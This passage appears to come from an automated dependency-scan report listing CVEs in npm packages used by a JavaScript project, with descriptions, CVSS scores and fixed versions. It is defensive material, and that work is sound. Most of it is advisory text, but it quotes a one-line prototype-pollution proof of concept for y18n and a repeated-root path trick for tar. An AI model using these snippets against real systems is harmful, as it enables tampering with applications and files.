    • Availability Impact: Low

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8116

Release Date: 2020-02-04

Fix Resolution: dot-prop - 5.1.1

CVE-2021-3664 (Medium) detected in url-parse-1.4.7.tgz

CVE-2021-3664 - Medium Severity Vulnerability

Vulnerable Library - url-parse-1.4.7.tgz

Small footprint URL parser that works seamlessly across Node.js and browser environments

Library home page: https://registry.npmjs.org/url-parse/-/url-parse-1.4.7.tgz

Dependency Hierarchy:

  • react-5.3.19.tgz (Root Library)
    • react-dev-utils-9.1.0.tgz
      • sockjs-client-1.4.0.tgz
        • url-parse-1.4.7.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

url-parse is vulnerable to URL Redirection to Untrusted Site

Publish Date: 2021-07-26

URL: CVE-2021-3664

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: Low
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3664

Release Date: 2021-07-26

Fix Resolution (url-parse): 1.5.2

Direct dependency fix Resolution (@storybook/react): 5.3.20

CVE-2021-23341 (High) detected in prismjs-1.19.0.tgz, prismjs-1.17.1.tgz

CVE-2021-23341 - High Severity Vulnerability

Vulnerable Libraries - prismjs-1.19.0.tgz, prismjs-1.17.1.tgz

prismjs-1.19.0.tgz

Lightweight, robust, elegant syntax highlighting. A spin-off project from Dabblet.

Library home page: https://registry.npmjs.org/prismjs/-/prismjs-1.19.0.tgz

Dependency Hierarchy:

  • addon-knobs-5.3.19.tgz (Root Library)
    • components-5.3.19.tgz
      • react-syntax-highlighter-11.0.2.tgz
        • prismjs-1.19.0.tgz (Vulnerable Library)

prismjs-1.17.1.tgz

Lightweight, robust, elegant syntax highlighting. A spin-off project from Dabblet.

Library home page: https://registry.npmjs.org/prismjs/-/prismjs-1.17.1.tgz

Dependency Hierarchy:

  • addon-knobs-5.3.19.tgz (Root Library)
    • components-5.3.19.tgz
      • react-syntax-highlighter-11.0.2.tgz
        • refractor-2.10.1.tgz
          • prismjs-1.17.1.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

The package prismjs before 1.23.0 is vulnerable to Regular Expression Denial of Service (ReDoS) via the prism-asciidoc, prism-rest, prism-tap and prism-eiffel components.

Publish Date: 2021-02-18

URL: CVE-2021-23341

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23341

Release Date: 2021-02-18

Fix Resolution (prismjs): 1.23.0

Direct dependency fix Resolution (@storybook/addon-knobs): 5.3.20

CVE-2021-32804 (High) detected in tar-2.2.2.tgz

CVE-2021-32804 - High Severity Vulnerability

Vulnerable Library - tar-2.2.2.tgz

tar for node

Library home page: https://registry.npmjs.org/tar/-/tar-2.2.2.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npm-5.1.0.tgz
      • tar-2.2.2.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

The npm package "tar" (aka node-tar) before versions 6.1.1, 5.0.6, 4.4.14, and 3.3.2 has an arbitrary File Creation/Overwrite vulnerability due to insufficient absolute path sanitization. node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the preservePaths flag is not set to true. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example /home/user/.bashrc would turn into home/user/.bashrc. This logic was insufficient when file paths contained repeated path roots such as ////home/user/.bashrc. node-tar would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. ///home/user/.bashrc) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite. This issue was addressed in releases 3.2.2, 4.4.14, 5.0.6 and 6.1.1. Users may work around this vulnerability without upgrading by creating a custom onentry method which sanitizes the entry.path or a filter method which removes entries with absolute paths. See the referenced GitHub Advisory for details. Be aware of CVE-2021-32803, which fixes a similar bug in later versions of tar.

Publish Date: 2021-08-03

URL: CVE-2021-32804

CVSS 3 Score Details (8.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: GHSA-3jfq-g458-7qm9

Release Date: 2021-08-03

Fix Resolution: tar - 3.2.2, 4.4.14, 5.0.6, 6.1.1

CVE-2021-23369 (High) detected in handlebars-4.7.6.tgz

CVE-2021-23369 - High Severity Vulnerability

Vulnerable Library - handlebars-4.7.6.tgz

Handlebars provides the power necessary to let you build semantic templates effectively with no frustration

Library home page: https://registry.npmjs.org/handlebars/-/handlebars-4.7.6.tgz

Dependency Hierarchy:

  • karma-coverage-1.1.2.tgz (Root Library)
    • istanbul-0.4.5.tgz
      • handlebars-4.7.6.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

The package handlebars before 4.7.7 is vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.

Publish Date: 2021-04-12

URL: CVE-2021-23369

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23369

Release Date: 2021-04-12

Fix Resolution (handlebars): 4.7.7

Direct dependency fix Resolution (karma-coverage): 2.0.0

CVE-2021-33587 (High) detected in css-what-3.2.1.tgz

CVE-2021-33587 - High Severity Vulnerability

Vulnerable Library - css-what-3.2.1.tgz

a CSS selector parser

Library home page: https://registry.npmjs.org/css-what/-/css-what-3.2.1.tgz

Dependency Hierarchy:

  • react-5.3.19.tgz (Root Library)
    • webpack-4.3.3.tgz
      • plugin-svgo-4.3.1.tgz
        • svgo-1.3.2.tgz
          • css-select-2.1.0.tgz
            • css-what-3.2.1.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

The css-what package 4.0.0 through 5.0.0 for Node.js does not ensure that attribute parsing has Linear Time Complexity relative to the size of the input.

Publish Date: 2021-05-28

URL: CVE-2021-33587

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33587

Release Date: 2021-05-28

Fix Resolution (css-what): 5.0.1

Direct dependency fix Resolution (@storybook/react): 6.1.7

CVE-2021-3757 (High) detected in immer-1.10.0.tgz

CVE-2021-3757 - High Severity Vulnerability

Vulnerable Library - immer-1.10.0.tgz

Create your next immutable state by mutating the current one

Library home page: https://registry.npmjs.org/immer/-/immer-1.10.0.tgz

Dependency Hierarchy:

  • react-5.3.19.tgz (Root Library)
    • react-dev-utils-9.1.0.tgz
      • immer-1.10.0.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

immer is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Publish Date: 2021-09-02

URL: CVE-2021-3757

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://huntr.dev/bounties/23d38099-71cd-42ed-a77a-71e68094adfa/

Release Date: 2021-09-02

Fix Resolution (immer): 9.0.6

Direct dependency fix Resolution (@storybook/react): 6.4.13

CVE-2019-16775 (Medium) detected in npm-5.1.0.tgz, npm-2.15.12.tgz

CVE-2019-16775 - Medium Severity Vulnerability

Vulnerable Libraries - npm-5.1.0.tgz, npm-2.15.12.tgz

npm-5.1.0.tgz

a package manager for JavaScript

Library home page: https://registry.npmjs.org/npm/-/npm-5.1.0.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npm-5.1.0.tgz (Vulnerable Library)

npm-2.15.12.tgz

a package manager for JavaScript

Library home page: https://registry.npmjs.org/npm/-/npm-2.15.12.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npmi-1.0.1.tgz
      • npm-2.15.12.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Versions of the npm CLI prior to 6.13.3 are vulnerable to an Arbitrary File Write. It is possible for packages to create symlinks to files outside of the node_modules folder through the bin field upon installation. A properly constructed entry in the package.json bin field would allow a package publisher to create a symlink pointing to arbitrary files on a user's system when the package is installed. This behavior is still possible through install scripts. This vulnerability bypasses a user using the --ignore-scripts install option.

Publish Date: 2019-12-13

URL: CVE-2019-16775

CVSS 3 Score Details (6.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: High
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: https://blog.npmjs.org/post/189618601100/binary-planting-with-the-npm-cli

Release Date: 2019-12-13

Fix Resolution: npm - 6.13.3; yarn - 1.21.1

CVE-2020-7660 (High) detected in serialize-javascript-1.9.1.tgz, serialize-javascript-2.1.2.tgz

CVE-2020-7660 - High Severity Vulnerability

Vulnerable Libraries - serialize-javascript-1.9.1.tgz, serialize-javascript-2.1.2.tgz

serialize-javascript-1.9.1.tgz

Serialize JavaScript to a superset of JSON that includes regular expressions and functions.

Library home page: https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-1.9.1.tgz

Dependency Hierarchy:

  • copy-webpack-plugin-4.5.2.tgz (Root Library)
    • serialize-javascript-1.9.1.tgz (Vulnerable Library)

serialize-javascript-2.1.2.tgz

Serialize JavaScript to a superset of JSON that includes regular expressions and functions.

Library home page: https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-2.1.2.tgz

Dependency Hierarchy:

  • react-5.3.19.tgz (Root Library)
    • core-5.3.19.tgz
      • terser-webpack-plugin-2.3.5.tgz
        • serialize-javascript-2.1.2.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function "deleteFunctions" within "index.js".

Publish Date: 2020-06-01

URL: CVE-2020-7660

CVSS 3 Score Details (8.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7660

Release Date: 2020-06-08

Fix Resolution (serialize-javascript): 3.1.0

Direct dependency fix Resolution (copy-webpack-plugin): 5.1.2

Fix Resolution (serialize-javascript): 3.1.0

Direct dependency fix Resolution (@storybook/react): 5.3.20

WS-2020-0344 (High) detected in is-my-json-valid-2.20.0.tgz

WS-2020-0344 - High Severity Vulnerability

Vulnerable Library - is-my-json-valid-2.20.0.tgz

A [JSONSchema](https://json-schema.org/) validator that uses code generation to be extremely fast.

Library home page: https://registry.npmjs.org/is-my-json-valid/-/is-my-json-valid-2.20.0.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npmi-1.0.1.tgz
      • npm-2.15.12.tgz
        • request-2.74.0.tgz
          • har-validator-2.0.6.tgz
            • is-my-json-valid-2.20.0.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Arbitrary Code Execution vulnerability was found in is-my-json-valid before 2.20.3 via the fromatName function.

Publish Date: 2020-06-09

URL: WS-2020-0344

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Release Date: 2020-06-09

Fix Resolution: is-my-json-valid - 2.20.3

CVE-2021-23337 (High) detected in multiple libraries

CVE-2021-23337 - High Severity Vulnerability

Vulnerable Libraries - lodash-4.17.4.tgz, lodash-4.17.20.tgz, lodash-3.3.1.tgz, lodash-4.17.15.tgz, lodash-4.17.19.tgz

lodash-4.17.4.tgz

Lodash modular utilities.

Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.4.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • lodash-4.17.4.tgz (Vulnerable Library)

lodash-4.17.20.tgz

Lodash modular utilities.

Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.20.tgz

Dependency Hierarchy:

  • preset-env-7.11.0.tgz (Root Library)
    • types-7.11.5.tgz
      • lodash-4.17.20.tgz (Vulnerable Library)

lodash-3.3.1.tgz

The modern build of lodash modular utilities.

Library home page: https://registry.npmjs.org/lodash/-/lodash-3.3.1.tgz

Dependency Hierarchy:

  • tidepool-platform-client-0.45.0.tgz (Root Library)
    • lodash-3.3.1.tgz (Vulnerable Library)

lodash-4.17.15.tgz

Lodash modular utilities.

Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.15.tgz

Dependency Hierarchy:

  • tideline-1.24.0-control-iq.4.tgz (Root Library)
    • lodash-4.17.15.tgz (Vulnerable Library)

lodash-4.17.19.tgz

Lodash modular utilities.

Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.19.tgz

Dependency Hierarchy:

  • lodash-4.17.19.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.

Publish Date: 2021-02-15

URL: CVE-2021-23337

CVSS 3 Score Details (7.2)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: High
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Release Date: 2021-02-15

Fix Resolution (lodash): 4.17.21

Direct dependency fix Resolution (@babel/preset-env): 7.11.5

CVE-2020-7774 (High) detected in y18n-4.0.0.tgz, y18n-3.2.1.tgz

CVE-2020-7774 - High Severity Vulnerability

Vulnerable Libraries - y18n-4.0.0.tgz, y18n-3.2.1.tgz

y18n-4.0.0.tgz

the bare-bones internationalization library used by yargs

Library home page: https://registry.npmjs.org/y18n/-/y18n-4.0.0.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npm-5.1.0.tgz
      • pacote-2.7.38.tgz
        • make-fetch-happen-2.6.0.tgz
          • cacache-10.0.4.tgz
            • y18n-4.0.0.tgz (Vulnerable Library)

y18n-3.2.1.tgz

the bare-bones internationalization library used by yargs

Library home page: https://registry.npmjs.org/y18n/-/y18n-3.2.1.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npm-5.1.0.tgz
      • pacote-2.7.38.tgz
        • cacache-9.3.0.tgz
          • y18n-3.2.1.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

This affects the package y18n before 3.2.2, 4.0.1 and 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('proto'); y18n.updateLocale({polluted: true}); console.log(polluted); // true

Publish Date: 2020-11-17

URL: CVE-2020-7774

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://www.npmjs.com/advisories/1654

Release Date: 2020-11-17

Fix Resolution: 3.2.2, 4.0.1, 5.0.5

CVE-2020-15138 (High) detected in prismjs-1.19.0.tgz, prismjs-1.17.1.tgz

CVE-2020-15138 - High Severity Vulnerability

Vulnerable Libraries - prismjs-1.19.0.tgz, prismjs-1.17.1.tgz

prismjs-1.19.0.tgz

Lightweight, robust, elegant syntax highlighting. A spin-off project from Dabblet.

Library home page: https://registry.npmjs.org/prismjs/-/prismjs-1.19.0.tgz

Dependency Hierarchy:

  • addon-knobs-5.3.19.tgz (Root Library)
    • components-5.3.19.tgz
      • react-syntax-highlighter-11.0.2.tgz
        • prismjs-1.19.0.tgz (Vulnerable Library)

prismjs-1.17.1.tgz

Lightweight, robust, elegant syntax highlighting. A spin-off project from Dabblet.

Library home page: https://registry.npmjs.org/prismjs/-/prismjs-1.17.1.tgz

Dependency Hierarchy:

  • addon-knobs-5.3.19.tgz (Root Library)
    • components-5.3.19.tgz
      • react-syntax-highlighter-11.0.2.tgz
        • refractor-2.10.1.tgz
          • prismjs-1.17.1.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Prism is vulnerable to Cross-Site Scripting. The easing preview of the Previewers plugin has an XSS vulnerability that allows attackers to execute arbitrary code in Safari and Internet Explorer. This impacts all Safari and Internet Explorer users of Prism >=v1.1.0 that use the Previewers plugin (>=v1.10.0) or the Previewer: Easing plugin (v1.1.0 to v1.9.0). This problem is fixed in version 1.21.0. To workaround the issue without upgrading, disable the easing preview on all impacted code blocks. You need Prism v1.10.0 or newer to apply this workaround.

Publish Date: 2020-08-07

URL: CVE-2020-15138

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: Low
    • Availability Impact: Low

Suggested Fix

Type: Upgrade version

Release Date: 2020-08-28

Fix Resolution (prismjs): 1.21.0

Direct dependency fix Resolution (@storybook/addon-knobs): 5.3.20

CVE-2021-23346 (Medium) detected in html-parse-stringify2-2.0.1.tgz

CVE-2021-23346 - Medium Severity Vulnerability

Vulnerable Library - html-parse-stringify2-2.0.1.tgz

Parses well-formed HTML (meaning all tags closed) into an AST and back. quickly.

Library home page: https://registry.npmjs.org/html-parse-stringify2/-/html-parse-stringify2-2.0.1.tgz

Dependency Hierarchy:

  • react-i18next-7.13.0.tgz (Root Library)
    • html-parse-stringify2-2.0.1.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

This affects the package html-parse-stringify before 2.0.1; all versions of package html-parse-stringify2. Sending certain input could cause one of the regular expressions that is used for parsing to backtrack, freezing the process.

Publish Date: 2021-03-04

URL: CVE-2021-23346

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

Suggested Fix

Type: Upgrade version

Origin: GHSA-545q-3fg6-48m7

Release Date: 2021-03-04

Fix Resolution: html-parse-stringify 2.0.1

CVE-2021-23424 (High) detected in ansi-html-0.0.7.tgz

CVE-2021-23424 - High Severity Vulnerability

Vulnerable Library - ansi-html-0.0.7.tgz

An elegant lib that converts the chalked (ANSI) text to HTML.

Library home page: https://registry.npmjs.org/ansi-html/-/ansi-html-0.0.7.tgz

Dependency Hierarchy:

  • react-5.3.19.tgz (Root Library)
    • core-5.3.19.tgz
      • webpack-hot-middleware-2.25.0.tgz
        • ansi-html-0.0.7.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

This affects all versions of package ansi-html. If an attacker provides a malicious string, it will get stuck processing the input for an extremely long time.

Publish Date: 2021-08-18

URL: CVE-2021-23424

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://nvd.nist.gov/vuln/detail/CVE-2021-23424

Release Date: 2021-08-18

Fix Resolution (ansi-html): 0.0.8

Direct dependency fix Resolution (@storybook/react): 5.3.20

CVE-2021-27292 (High) detected in ua-parser-js-0.7.21.tgz

CVE-2021-27292 - High Severity Vulnerability

Vulnerable Library - ua-parser-js-0.7.21.tgz

Lightweight JavaScript-based user-agent string parser

Library home page: https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-0.7.21.tgz

Dependency Hierarchy:

  • create-react-class-15.6.3.tgz (Root Library)
    • fbjs-0.8.17.tgz
      • ua-parser-js-0.7.21.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

ua-parser-js >= 0.7.14, fixed in 0.7.24, uses a regular expression which is vulnerable to denial of service. If an attacker sends a malicious User-Agent header, ua-parser-js will get stuck processing it for an extended period of time.

Publish Date: 2021-03-17

URL: CVE-2021-27292

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Release Date: 2021-03-17

Fix Resolution (ua-parser-js): 0.7.24

Direct dependency fix Resolution (create-react-class): 15.7.0

WS-2020-0042 (High) detected in acorn-6.4.0.tgz

WS-2020-0042 - High Severity Vulnerability

Vulnerable Library - acorn-6.4.0.tgz

ECMAScript parser

Library home page: https://registry.npmjs.org/acorn/-/acorn-6.4.0.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/acorn/package.json

Dependency Hierarchy:

  • addon-actions-5.3.19.tgz (Root Library)
    • react-inspector-4.0.0.tgz
      • storybook-chromatic-2.2.2.tgz
        • jsdom-11.12.0.tgz
          • acorn-globals-4.3.4.tgz
            • acorn-6.4.0.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

acorn is vulnerable to Regular Expression Denial of Service (ReDoS). A regex of the form /[x-\ud800]/u causes the parser to enter an infinite loop. Attackers may leverage the vulnerability to cause a Denial of Service, since the string is not valid UTF-16 and is therefore not sanitized before reaching the parser.

Publish Date: 2020-03-01

URL: WS-2020-0042

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://www.npmjs.com/advisories/1488

Release Date: 2020-03-01

Fix Resolution (acorn): 6.4.1

Direct dependency fix Resolution (@storybook/addon-actions): 5.3.20

WS-2018-0076 (Medium) detected in tunnel-agent-0.4.3.tgz

WS-2018-0076 - Medium Severity Vulnerability

Vulnerable Library - tunnel-agent-0.4.3.tgz

HTTP proxy tunneling agent. Formerly part of mikeal/request, now a standalone module.

Library home page: https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.4.3.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npmi-1.0.1.tgz
      • npm-2.15.12.tgz
        • request-2.74.0.tgz
          • tunnel-agent-0.4.3.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Versions of tunnel-agent before 0.6.0 are vulnerable to memory exposure. This is exploitable if user supplied input is provided to the auth value and is a number.

Publish Date: 2017-03-05

URL: WS-2018-0076

CVSS 3 Score Details (5.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Local
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: None
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: https://nodesecurity.io/advisories/598

Release Date: 2017-03-05

Fix Resolution: 0.6.0

CVE-2021-23807 (High) detected in jsonpointer-4.0.1.tgz

CVE-2021-23807 - High Severity Vulnerability

Vulnerable Library - jsonpointer-4.0.1.tgz

Simple JSON Addressing.

Library home page: https://registry.npmjs.org/jsonpointer/-/jsonpointer-4.0.1.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npmi-1.0.1.tgz
      • npm-2.15.12.tgz
        • request-2.74.0.tgz
          • har-validator-2.0.6.tgz
            • is-my-json-valid-2.20.0.tgz
              • jsonpointer-4.0.1.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

This affects the package jsonpointer before 5.0.0. A type confusion vulnerability can lead to a bypass of a previous Prototype Pollution fix when the pointer components are arrays.

Publish Date: 2021-11-03

URL: CVE-2021-23807

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23807

Release Date: 2021-11-03

Fix Resolution: jsonpointer - 5.0.0

CVE-2021-27290 (High) detected in ssri-5.3.0.tgz

CVE-2021-27290 - High Severity Vulnerability

Vulnerable Library - ssri-5.3.0.tgz

Standard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.

Library home page: https://registry.npmjs.org/ssri/-/ssri-5.3.0.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npm-5.1.0.tgz
      • pacote-2.7.38.tgz
        • make-fetch-happen-2.6.0.tgz
          • ssri-5.3.0.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

ssri 5.2.2-8.0.0, fixed in 8.0.1, processes SRIs using a regular expression which is vulnerable to a denial of service. Malicious SRIs could take an extremely long time to process, leading to denial of service. This issue only affects consumers using the strict option.

Publish Date: 2021-03-12

URL: CVE-2021-27290

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: GHSA-vx3p-948g-6vhq

Release Date: 2021-03-12

Fix Resolution: ssri - 6.0.2, 7.1.1, 8.0.1

CVE-2020-7693 (Medium) detected in sockjs-0.3.19.tgz

CVE-2020-7693 - Medium Severity Vulnerability

Vulnerable Library - sockjs-0.3.19.tgz

SockJS-node is a server counterpart of SockJS-client a JavaScript library that provides a WebSocket-like object in the browser. SockJS gives you a coherent, cross-browser, Javascript API which creates a low latency, full duplex, cross-domain communication

Library home page: https://registry.npmjs.org/sockjs/-/sockjs-0.3.19.tgz

Dependency Hierarchy:

  • webpack-dev-server-3.8.0.tgz (Root Library)
    • sockjs-0.3.19.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Incorrect handling of an Upgrade header with the value websocket leads to crashes of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.

Publish Date: 2020-07-09

URL: CVE-2020-7693

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

Suggested Fix

Type: Upgrade version

Release Date: 2020-07-14

Fix Resolution (sockjs): 0.3.20

Direct dependency fix Resolution (webpack-dev-server): 3.11.0

CVE-2019-10744 (High) detected in lodash-4.17.4.tgz, lodash-3.3.1.tgz

CVE-2019-10744 - High Severity Vulnerability

Vulnerable Libraries - lodash-4.17.4.tgz, lodash-3.3.1.tgz

lodash-4.17.4.tgz

Lodash modular utilities.

Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.4.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • lodash-4.17.4.tgz (Vulnerable Library)

lodash-3.3.1.tgz

The modern build of lodash modular utilities.

Library home page: https://registry.npmjs.org/lodash/-/lodash-3.3.1.tgz

Dependency Hierarchy:

  • tidepool-platform-client-0.45.0.tgz (Root Library)
    • lodash-3.3.1.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.

Publish Date: 2019-07-26

URL: CVE-2019-10744

CVSS 3 Score Details (9.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
